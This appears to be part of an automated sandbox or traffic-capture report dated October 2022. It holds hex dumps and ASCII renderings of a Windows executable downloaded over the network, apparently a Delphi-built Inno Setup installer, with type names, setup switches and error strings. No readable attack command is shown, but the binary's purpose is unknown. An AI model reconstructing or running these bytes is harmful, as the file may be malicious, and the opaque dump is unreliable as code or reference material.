1c d6 48 00 34 d6 48 00 10 db 48 00 f4 d7 48 00 5c db 48 00 5c d8 48
                                                                                                                                                                                                                                    Data Ascii: SelfGTStreamF@System.ClassesGG@HHPosition@ HSizehGtGGGGhF]@]@`@`@,`@0`@4`@(`@\@\@\@HH4HHH\H\H
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17065INData Raw: 66 02 00 02 00 27 00 5c 7b 49 00 07 57 61 69 74 46 6f 72 03 00 e4 10 40 00 08 00 01 08 44 4d 47 00 00 00 04 53 65 6c 66 02 00 02 00 21 00 18 7c 4b 00 0f 43 68 65 63 6b 54 65 72 6d 69 6e 61 74 65 64 03 00 00 10 40 00 08 00 00 02 00 2f 00 18 7c 4b 00 0e 53 65 74 52 65 74 75 72 6e 56 61 6c 75 65 03 00 00 00 00 00 08 00 01 00 9c 10 40 00 00 00 05 56 61 6c 75 65 02 00 02 00 39 00 ec 76 49 00 05 51 75 65 75 65 03 00 00 00 00 00 10 00 02 0a 44 4d 47 00 00 00 07 41 54 68 72 65 61 64 02 00 00 c0 41 47 00 08 00 07 41 4d 65 74 68 6f 64 02 00 02 00 3d 00 18 7c 4b 00 05 51 75 65 75 65 03 00 00 00 00 00 08 00 02 0a 44 4d 47 00 00 00 07 41 54 68 72 65 61 64 02 00 08 e4 41 47 00 01 00 0b 41 54 68 72 65 61 64 50 72 6f 63 02 00 02 00 46 00 18 7c 4b 00 12 52 65 6d 6f 76 65
                                                                                                                                                                                                                                    Data Ascii: f'\{IWaitFor@DMGSelf!|KCheckTerminated@/|KSetReturnValue@Value9vIQueueDMGAThreadAGAMethod=|KQueueDMGAThreadAGAThreadProcF|KRemove
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17081INData Raw: 10 17 40 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 4c aa 49 00 b4 57 40 00 70 aa 49 00 00 00 03 00 06 89 47 00 4d 00 ff ff 2d 89 47 00 42 00 f4 ff 5a 89 47 00 4a 00 01 00 02 00 2b 54 45 6e 75 6d 65 72 61 62 6c 65 3c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 43 6f 6c 6c 65 63 74 69 6f 6e 49 74 65 6d 3e 27 00 4c aa 49 00 07 44 65 73 74 72 6f 79 03 00 00 00 00 00 08 00 01 08 8c 89 47 00 00 00 04 53 65 6c 66 02 00 02 00 2d 00 18 7c 4b 00 0d 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 03 00 d4 87 47 00 08 00 01 08 8c 89 47 00 00 00 04 53 65 6c 66 02 00 02 00 32 00 70 aa 49 00 07 54 6f 41 72 72 61 79 03 00 c4 86 47 00 08 00 02 08 8c 89 47 00 00 00 04 53 65 6c 66 02 00 40 c4 86 47
                                                                                                                                                                                                                                    Data Ascii: @]@]@`@`@,`@0`@4`@(`@\@\@LIW@pIGM-GBZGJ+TEnumerable<System.Classes.TCollectionItem>'LIDestroyGSelf-|KGetEnumeratorGGSelf2pIToArrayGGSelf@G
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17097INData Raw: 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 00 00 00 00 02 00 00 00 a8 c8 47 00 0e 3f 54 44 69 63 74 69 6f 6e 61 72 79 3c 53 79 73 74 65 6d 2e 49 6e 74 65 67 65 72 2c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 49 49 6e 74 65 72 66 61 63 65 4c 69 73 74 3e 2e 54 49 74 65 6d 0c 00 00 00 01 00 00 00 f0 ce 46 00 08 00 00 00 00 03 00 00 00 9c 10 40 00 00 00 00 00 02 08 48 61 73 68 43 6f 64 65 02 00 9c 10 40 00 04 00 00 00 02 03 4b 65 79 02 00 f0 ce 46 00 08 00 00 00 02 05 56 61 6c 75 65 02 00 02 00 00 00 00 00 3c c9 47 00 11 44 54 44 69 63 74 69 6f 6e 61 72 79 3c 53 79 73 74 65 6d 2e 49 6e 74 65 67 65 72 2c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 49 49 6e 74 65 72 66 61 63 65 4c 69 73 74 3e 2e 54 49 74 65 6d 41 72 72 61 79 0c
                                                                                                                                                                                                                                    Data Ascii: tem.Generics.CollectionsG?TDictionary<System.Integer,System.Classes.IInterfaceList>.TItemF@HashCode@KeyFValue<GDTDictionary<System.Integer,System.Classes.IInterfaceList>.TItemArray
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17113INData Raw: 54 4f 62 6a 65 63 74 02 04 49 74 65 6d 10 54 50 65 72 73 69 73 74 65 6e 74 43 6c 61 73 73 00 06 41 63 74 69 6f 6e 17 54 43 6f 6c 6c 65 63 74 69 6f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 00 88 1f 40 00 74 d9 46 00 98 0d 43 00 d5 08 48 00 02 00 00 00 00 00 00 00 03 08 88 1f 40 00 06 53 65 6e 64 65 72 02 00 02 74 d9 46 00 04 49 74 65 6d 02 00 00 98 0d 43 00 06 41 63 74 69 6f 6e 02 00 5c 09 48 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 0a 48 00 64 09 48 00 95 09 48 00 00 00 00 00 ab 09 48 00 10 00 00 00 4c 11 44 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 d8 5c 40 00 b4 d2 49 00 c8 d2 49 00 00 00 00 00 00 00 02 00 00 4c 1d 48 00 04 00 00 00 0b 46 44 69 63 74 69 6f 6e 61 72 79 02 00
                                                                                                                                                                                                                                    Data Ascii: TObjectItemTPersistentClassActionTCollectionNotification@tFCH@SendertFItemCAction\H\HdHHHLD]@]@`@`@,`@0`@4`@(`@\@\@\@IILHFDictionary
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17129INData Raw: e8 d7 8d 01 00 84 c0 75 cc 33 c0 5a 59 59 64 89 10 68 b2 48 48 00 83 7d e4 00 74 0a b2 01 8b 45 e4 8b 08 ff 51 fc c3 e9 8c 27 f8 ff eb e8 8b 45 f4 83 c0 04 89 45 d8 8b 45 d8 8b 00 8b 55 d8 33 c9 89 0a e8 1c 14 f8 ff 8b 45 f4 8b 55 f0 89 50 04 8b 45 f4 83 78 08 00 0f 84 e4 00 00 00 8b 0d 1c 1c 4c 00 85 c9 74 03 83 e9 f8 b2 01 a1 98 16 48 00 e8 29 86 01 00 89 45 f0 8b 45 f4 8b 40 08 e8 07 89 01 00 89 45 e0 33 c0 55 68 6e 49 48 00 64 ff 30 64 89 20 eb 28 8d 55 f8 8b 45 e0 e8 a5 8c 01 00 8b 5d fc 8b f3 3b 75 ec 72 05 3b 75 e8 72 0e 8b 4d fc 8b 55 f8 8b 45 f0 e8 f8 86 01 00 8b 45 e0 e8 14 8d 01 00 84 c0 75 cc 33 c0 5a 59 59 64 89 10 68 75 49 48 00 83 7d e0 00 74 0a b2 01 8b 45 e0 8b 08 ff 51 fc c3 e9 c9 26 f8 ff eb e8 8b 45 f4 83 c0 08 89 45 d4 8b 45 d4 8b 00
                                                                                                                                                                                                                                    Data Ascii: u3ZYYdhHH}tEQ'EEEU3EUPExLtH)EE@E3UhnIHd0d (UE];ur;urMUEEu3ZYYdhuIH}tEQ&EEE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17145INData Raw: 4a 00 01 00 02 00 61 54 45 6e 75 6d 65 72 61 62 6c 65 3c 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 54 50 61 69 72 3c 53 79 73 74 65 6d 2e 54 43 6c 61 73 73 2c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 46 69 65 6c 64 73 43 61 63 68 65 2e 54 46 69 65 6c 64 73 3e 3e 27 00 9c f0 49 00 07 44 65 73 74 72 6f 79 03 00 00 00 00 00 08 00 01 08 74 89 48 00 00 00 04 53 65 6c 66 02 00 02 00 2d 00 18 7c 4b 00 0d 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 03 00 4c 87 48 00 08 00 01 08 74 89 48 00 00 00 04 53 65 6c 66 02 00 02 00 32 00 c0 f0 49 00 07 54 6f 41 72 72 61 79 03 00 d4 85 48 00 08 00 02 08 74 89 48 00 00 00 04 53 65 6c 66 02 00 40 d4 85 48 00 01 00 01 01 02 00 02 00 00 00 78 89 48 00 07 61 54 45 6e 75 6d 65 72 61 62
                                                                                                                                                                                                                                    Data Ascii: JaTEnumerable<System.Generics.Collections.TPair<System.TClass,System.Classes.TFieldsCache.TFields>>'IDestroytHSelf-|KGetEnumeratorLHtHSelf2IToArrayHtHSelf@HxHaTEnumerab
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17161INData Raw: d7 c8 48 00 64 ff 32 64 89 22 85 db 7c 05 3b 5e 08 7c 17 8d 55 f8 a1 d4 a6 4b 00 e8 4c 01 f8 ff 8b 55 f8 8b 06 8b cb ff 50 0c 8b 46 04 8d 04 98 8b d7 e8 d9 eb f7 ff 33 c0 5a 59 59 64 89 10 68 de c8 48 00 8b 45 fc 8b 40 0c 8b 40 08 e8 92 9f f7 ff c3 e9 60 a7 f7 ff eb ea 33 c0 5a 59 59 64 89 10 68 fb c8 48 00 8d 45 f8 e8 2d b1 f7 ff c3 e9 43 a7 f7 ff eb f0 5f 5e 5b 59 59 5d c3 8b c0 33 c9 e8 01 00 00 00 c3 55 8b ec 83 c4 f0 53 56 57 8b d9 8b f2 89 45 fc 8b 45 fc 8b 40 0c e8 75 dc 00 00 8b f8 33 d2 55 68 9c c9 48 00 64 ff 32 64 89 22 89 75 f4 8d 47 04 89 45 f0 84 db 75 0d 8d 55 f4 8b 45 f0 e8 19 4a fa ff eb 0b 8d 55 f4 8b 45 f0 e8 b8 4a fa ff 89 45 f8 83 7d f8 ff 7e 1b 8b 47 04 8b 55 f8 8d 04 90 e8 09 eb f7 ff 8d 47 04 b1 05 8b 55 f8 e8 f4 55 fa ff 33 c0 5a
                                                                                                                                                                                                                                    Data Ascii: Hd2d"|;^|UKLUPF3ZYYdhHE@@`3ZYYdhHE-C_^[YY]3USVWEE@u3UhHd2d"uGEuUEJUEJE}~GUGUU3Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17177INData Raw: 45 08 f6 40 ef 01 75 09 8b 45 08 83 78 e8 00 74 04 33 c0 5d c3 b0 01 5d c3 8d 40 00 55 8b ec 53 56 8b f0 33 db e8 c6 4b f7 ff 8b 15 d0 4d 41 00 e8 77 56 f7 ff 84 c0 74 3b 8b 45 08 50 e8 ba ff ff ff 59 84 c0 74 07 8b 06 e8 16 54 f7 ff 33 c0 89 06 8b 45 08 8b 40 f0 33 d2 e8 89 1a 00 00 e8 8c 4b f7 ff 8b 50 04 8b 45 08 8b 40 f0 8b 08 ff 51 10 8b d8 8b c3 5e 5b 5d c3 8b c0 55 8b ec 53 56 57 33 c0 55 68 e6 09 49 00 64 ff 30 64 89 20 8b 45 08 8b 50 e4 8b 45 08 8b 40 f0 e8 eb 1b 00 00 8b d8 8b 45 08 33 d2 89 50 f8 8b 45 08 8b 40 f0 66 83 78 72 00 74 1b 8b 45 08 83 c0 f8 50 8b 45 08 8b 70 f0 8b 45 08 8b 50 f0 8b cb 8b 46 74 ff 56 70 8b 45 08 83 78 f8 00 75 71 8b c3 ff 50 f4 8b 55 08 89 42 f8 8b 45 08 f6 40 ef 04 74 17 8b 45 08 8b 40 f8 66 83 48 1c 01 8b 45 08 8b
                                                                                                                                                                                                                                    Data Ascii: E@uExt3]]@USV3KMAwVt;EPYtT3E@3KPE@Q^[]USVW3UhId0d EPE@E3PE@fxrtEPEpEPFtVpExuqPUBE@tE@fHE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17193INData Raw: f8 8b 45 08 8b 40 fc e8 a0 ee ff ff 59 59 5d c3 55 8b ec 6a 00 33 c0 55 68 e9 48 49 00 64 ff 30 64 89 20 8d 4d fc 8b 45 08 8b 50 f8 8b 45 08 8b 40 f0 e8 25 3d fd ff 8b 45 08 50 e8 54 fc ff ff 59 8b 45 08 8b 40 fc 8b 55 fc e8 15 0b 00 00 33 c0 5a 59 59 64 89 10 68 f0 48 49 00 8d 45 fc e8 38 31 f7 ff c3 e9 4e 27 f7 ff eb f0 59 5d c3 90 b1 01 85 c0 74 0b 3b d0 74 09 8b 40 04 85 c0 75 f5 33 c9 8b c1 c3 8b c0 55 8b ec 6a 00 53 56 57 8b f2 8b d8 33 c0 55 68 fb 49 49 00 64 ff 30 64 89 20 8b 45 08 8b 40 fc 8b 40 1c 3b 43 04 75 0f 8b c6 8b 53 08 e8 c2 34 f7 ff e9 a2 00 00 00 8b 55 08 3b c3 75 11 8b c6 ba 14 4a 49 00 e8 aa 34 f7 ff e9 8a 00 00 00 8b 7b 04 85 ff 74 65 83 7f 08 00 74 5f 83 7b 08 00 74 59 8b 45 08 8b 40 fc 8b 50 1c 8b c7 e8 76 ff ff ff 84 c0 74 29 8b
                                                                                                                                                                                                                                    Data Ascii: E@YY]Uj3UhHId0d MEPE@%=EPTYE@U3ZYYdhHIE81N'Y]t;t@u3UjSVW3UhIId0d E@@;CuS4U;uJI4{tet_{tYE@Pvt)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17209INData Raw: 60 88 49 00 0c 00 00 00 00 00 00 00 c8 83 49 00 ec 88 49 00 70 88 49 00 00 00 00 00 00 00 00 00 10 89 49 00 00 00 00 00 ec 88 49 00 00 00 00 00 f2 88 49 00 14 00 00 00 9c 27 40 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 e0 c5 40 00 ec c5 40 00 34 60 40 00 28 60 40 00 00 c6 40 00 a4 5c 40 00 d8 5c 40 00 00 00 00 00 00 00 19 54 43 6f 6d 70 6f 6e 65 6e 74 2e 43 72 65 61 74 65 40 24 41 63 74 52 65 63 10 89 49 00 07 19 54 43 6f 6d 70 6f 6e 65 6e 74 2e 43 72 65 61 74 65 40 24 41 63 74 52 65 63 ec 88 49 00 d8 28 40 00 00 00 0e 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 00 00 00 00 02 00 00 00 8b 42 08 8b 51 08 e8 29 0e f8 ff c3 53 56 57 55 83 c4 f8 8b ea 8b d8 33 f6 85 ed 0f 84 94 00 00 00 83 7b 10 00 0f 84 8a 00 00 00 83 7b 34 00 75 77 b2 01 a1 5c b6 47
                                                                                                                                                                                                                                    Data Ascii: `IIIpIIII'@]@]@`@`@@@4`@(`@@\@\@TComponent.Create@$ActRecITComponent.Create@$ActRecI(@System.ClassesBQ)SVWU3{{4uw\G
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17225INData Raw: ca 8b d0 8b 43 24 ff 53 20 5b c3 90 53 56 84 d2 74 08 83 c4 f0 e8 12 9a f6 ff 8b da 8b f0 33 c9 33 d2 8b c6 e8 1b 00 00 00 8b c6 84 db 74 0f e8 50 9a f6 ff 64 8f 05 00 00 00 00 83 c4 0c 8b c6 5e 5b c3 90 53 56 57 84 d2 74 08 83 c4 f0 e8 d9 99 f6 ff 8b f1 8b da 8b f8 33 d2 8b c7 e8 d2 93 f6 ff a1 04 e7 47 00 89 47 0c 89 7f 10 8b c7 e8 90 fe ff ff 8b d6 8b c7 e8 ef fe ff ff 8b c7 84 db 74 0f e8 fc 99 f6 ff 64 8f 05 00 00 00 00 83 c4 0c 8b c7 5f 5e 5b c3 53 56 e8 35 9a f6 ff 8b da 8b f0 83 7e 08 00 7e 0a 8d 46 04 33 d2 e8 ed 59 f9 ff 8d 46 04 33 d2 e8 cf 59 f9 ff b2 fc 22 d3 8b c6 e8 f8 fc ff ff 84 db 7e 07 8b c6 e8 a9 99 f6 ff 5e 5b c3 8b c0 55 8b ec 83 c4 f0 89 4d f8 89 55 fc ff 75 04 8b 45 f8 89 45 f0 c6 45 f4 00 8d 45 f0 50 6a 00 8b 4d fc b2 01 a1 b8 56
                                                                                                                                                                                                                                    Data Ascii: C$S [SVt33tPd^[SVWt3GGtd_^[SV5~~F3YF3Y"~^[UMUuEEEEPjMV
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17241INData Raw: 40 08 8b 52 04 8b 04 82 c3 8d 40 00 8b 50 04 8b 40 08 8b 52 04 8b 04 82 c3 8d 40 00 ff 40 08 8b 50 08 8b 40 04 3b 50 08 0f 9c c0 c3 53 56 57 84 d2 74 08 83 c4 f0 e8 f1 59 f6 ff 8b f1 8b da 8b f8 33 d2 8b c7 e8 ea 53 f6 ff 89 77 04 c7 47 08 ff ff ff ff 8b c7 84 db 74 0f e8 25 5a f6 ff 64 8f 05 00 00 00 00 83 c4 0c 8b c7 5f 5e 5b c3 90 53 56 84 d2 74 08 83 c4 f0 e8 ae 59 f6 ff 8b da 8b f0 33 d2 8b c6 e8 a9 53 f6 ff b2 01 a1 10 17 40 00 e8 9d 53 f6 ff 89 46 08 b2 01 a1 34 5e 49 00 e8 4a 04 00 00 89 46 04 c6 46 0c 00 8b c6 84 db 74 0f e8 cc 59 f6 ff 64 8f 05 00 00 00 00 83 c4 0c 8b c6 5e 5b c3 90 55 8b ec 83 c4 f8 e8 01 5a f6 ff 88 55 fb 89 45 fc 8b 45 fc e8 67 01 00 00 33 c0 55 68 b1 09 4a 00 64 ff 30 64 89 20 8b 45 fc 8b 40 04 e8 6a 53 f6 ff 0f b6 55 fb 80
                                                                                                                                                                                                                                    Data Ascii: @R@P@R@@P@;PSVWtY3SwGt%Zd_^[SVtY3S@SF4^IJFFtYd^[UZUEEg3UhJd0d E@jSU
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17257INData Raw: 53 65 6c 66 02 00 02 00 90 48 4a 00 07 21 54 4c 69 73 74 3c 53 79 73 74 65 6d 2e 49 6e 74 65 67 65 72 3e 2e 54 45 6e 75 6d 65 72 61 74 6f 72 c4 47 4a 00 38 cc 47 00 00 00 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 00 00 01 00 02 e8 48 4a 00 02 00 02 00 00 00 9c 10 40 00 94 15 4a 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 07 43 75 72 72 65 6e 74 00 00 64 49 4a 00 00 00 00 00 00 00 00 00 74 49 4a 00 4c 55 4a 00 86 49 4a 00 cf 49 4a 00 00 00 00 00 35 4b 4a 00 2c 00 00 00 b0 cc 47 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 f8 14 4a 00 44 14 4a 00 80 15 4a 00 54 14 4a 00 38 15 4a 00 0e 00 00 00 00 00 01 00 00 00 74 46 4a 00 1c
                                                                                                                                                                                                                                    Data Ascii: SelfHJ!TList<System.Integer>.TEnumeratorGJ8GSystem.Generics.CollectionsHJ@JCurrentdIJtIJLUJIJIJ5KJ,G]@]@`@`@,`@0`@4`@(`@\@\@JDJJTJ8JtFJ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17273INData Raw: 3e 3e 00 03 08 06 53 65 6e 64 65 72 07 54 4f 62 6a 65 63 74 12 04 49 74 65 6d 24 54 50 61 69 72 3c 53 79 73 74 65 6d 2e 73 74 72 69 6e 67 2c 53 79 73 74 65 6d 2e 43 61 72 64 69 6e 61 6c 3e 00 06 41 63 74 69 6f 6e 17 54 43 6f 6c 6c 65 63 74 69 6f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 00 88 1f 40 00 94 6a 48 00 98 0d 43 00 f6 88 4a 00 02 00 00 00 00 00 00 00 03 08 88 1f 40 00 06 53 65 6e 64 65 72 02 00 12 94 6a 48 00 04 49 74 65 6d 02 00 00 98 0d 43 00 06 41 63 74 69 6f 6e 02 00 00 00 00 2c 89 4a 00 0f 4d 49 45 6e 75 6d 65 72 61 62 6c 65 3c 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 54 50 61 69 72 3c 53 79 73 74 65 6d 2e 73 74 72 69 6e 67 2c 53 79 73 74 65 6d 2e 43 61 72 64 69 6e 61 6c 3e 3e e4 26 40 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: >>SenderTObjectItem$TPair<System.string,System.Cardinal>ActionTCollectionNotification@jHCJ@SenderjHItemCAction,JMIEnumerable<System.Generics.Collections.TPair<System.string,System.Cardinal>>&@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17289INData Raw: 03 08 38 ce 4a 00 00 00 04 53 65 6c 66 02 00 0a 70 68 48 00 01 00 05 56 61 6c 75 65 02 00 00 b0 d8 40 00 02 00 09 44 69 72 65 63 74 69 6f 6e 02 00 02 00 35 00 18 7c 4b 00 06 44 65 6c 65 74 65 03 00 00 00 00 00 08 00 02 08 38 ce 4a 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 05 49 6e 64 65 78 02 00 02 00 4b 00 18 7c 4b 00 0b 44 65 6c 65 74 65 52 61 6e 67 65 03 00 00 00 00 00 08 00 03 08 38 ce 4a 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 06 41 49 6e 64 65 78 02 00 00 9c 10 40 00 02 00 06 41 43 6f 75 6e 74 02 00 02 00 4d 00 18 7c 4b 00 0b 45 78 74 72 61 63 74 49 74 65 6d 03 00 70 68 48 00 08 00 03 08 38 ce 4a 00 00 00 04 53 65 6c 66 02 00 0a 70 68 48 00 01 00 05 56 61 6c 75 65 02 00 00 b0 d8 40 00 02 00 09 44 69 72 65 63 74 69 6f 6e 02 00 02
                                                                                                                                                                                                                                    Data Ascii: 8JSelfphHValue@Direction5|KDelete8JSelf@IndexK|KDeleteRange8JSelf@AIndex@ACountM|KExtractItemphH8JSelfphHValue@Direction
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17305INData Raw: 65 00 74 00 75 00 70 00 20 00 74 00 6f 00 20 00 66 00 6f 00 72 00 63 00 65 00 20 00 63 00 6c 00 6f 00 73 00 65 00 20 00 77 00 68 00 65 00 6e 00 20 00 63 00 6c 00 6f 00 73 00 69 00 6e 00 67 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 73 00 2e 00 0d 00 0a 00 2f 00 46 00 4f 00 52 00 43 00 45 00 4e 00 4f 00 43 00 4c 00 4f 00 53 00 45 00 41 00 50 00 50 00 4c 00 49 00 43 00 41 00 54 00 49 00 4f 00 4e 00 53 00 0d 00 0a 00 50 00 72 00 65 00 76 00 65 00 6e 00 74 00 73 00 20 00 53 00 65 00 74 00 75 00 70 00 20 00 66 00 72 00 6f 00 6d 00 20 00 66 00 6f 00 72 00 63 00 65 00 20 00 63 00 6c 00 6f 00 73 00 69 00 6e 00 67 00 20 00 77 00 68 00 65 00 6e 00 20 00 63 00 6c 00 6f 00 73 00 69 00 6e 00 67 00 20 00 61 00 70 00 70 00 6c 00 69 00 63
                                                                                                                                                                                                                                    Data Ascii: etup to force close when closing applications./FORCENOCLOSEAPPLICATIONSPrevents Setup from force closing when closing applic
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17321INData Raw: 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 18 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 44 65 66 61 75 6c 74 73 0f 53 79 73 74 65 6d 2e 56 61 72 69 61 6e 74 73 0f 53 79 73 74 65 6d 2e 56 61 72 55 74 69 6c 73 0b 53 79 73 74 65 6d 2e 52 74 74 69 0b 53 79 73 74 65 6d 2e 4d 61 74 68 0b 53 79 73 74 65 6d 2e 48 61 73 68 0e 53 79 73 74 65 6d 2e 54 79 70 49 6e 66 6f 0e 57 69 6e 61 70 69 2e 41 63 74 69 76 65 58 0f 57 69 6e 61 70 69 2e 4d 65 73 73 61 67 65 73 0a 53 65 74 75 70 54 79 70 65 73 06 53 74 72 75 63 74 04 53 48 41 31 09 52 65 64 69 72 46 75 6e 63 07 56 65 72 49 6e 66 6f 06 4d 73 67 49 44 73 04 4d 73 67 73 08 43 6f 6d 70 72 65 73 73 0f 57 69 6e 61 70 69 2e 53 68 65 6c
                                                                                                                                                                                                                                    Data Ascii: System.ClassesSystem.Generics.CollectionsSystem.Generics.DefaultsSystem.VariantsSystem.VarUtilsSystem.RttiSystem.MathSystem.HashSystem.TypInfoWinapi.ActiveXWinapi.MessagesSetupTypesStructSHA1RedirFuncVerInfoMsgIDsMsgsCompressWinapi.Shel
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17337INData Raw: 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 20 f5 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 10 f1 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 14 e5 43 00 3c d7 43 00 3c d7 43 00 14 e5 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 14 e5 43 00 14 e5 43 00 14 e5 43 00 20 f5 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 14 e5 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 18 f9 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 20 f5 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43 00 3c d7 43
                                                                                                                                                                                                                                    Data Ascii: <C<C<C<C<C<C<C C<C<C<CC<C<C<C<C<C<C<C<CC<C<CC<C<C<CCCC C<C<C<C<C<CC<C<C<C<C<C<C<C<C<C<CC<C<C<C<C<C C<C<C<C<C<C<C<C<C<C<C
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17353INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17369INData Raw: 76 00 61 00 72 00 69 00 61 00 6e 00 74 00 20 00 6f 00 70 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 28 00 25 00 73 00 25 00 2e 00 38 00 78 00 29 00 0a 00 25 00 73 00 35 00 43 00 6f 00 75 00 6c 00 64 00 20 00 6e 00 6f 00 74 00 20 00 63 00 6f 00 6e 00 76 00 65 00 72 00 74 00 20 00 76 00 61 00 72 00 69 00 61 00 6e 00 74 00 20 00 6f 00 66 00 20 00 74 00 79 00 70 00 65 00 20 00 28 00 25 00 73 00 29 00 20 00 69 00 6e 00 74 00 6f 00 20 00 74 00 79 00 70 00 65 00 20 00 28 00 25 00 73 00 29 00 3d 00 4f 00 76 00 65 00 72 00 66 00 6c 00 6f 00 77 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 63 00 6f 00 6e 00 76 00 65 00 72 00 74 00 69 00 6e 00 67 00 20 00 76 00 61 00 72 00 69 00 61 00 6e 00 74 00 20 00 6f 00 66 00 20 00 74 00 79 00 70 00 65 00 20 00 28 00 25
                                                                                                                                                                                                                                    Data Ascii: variant operation (%s%.8x)%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%
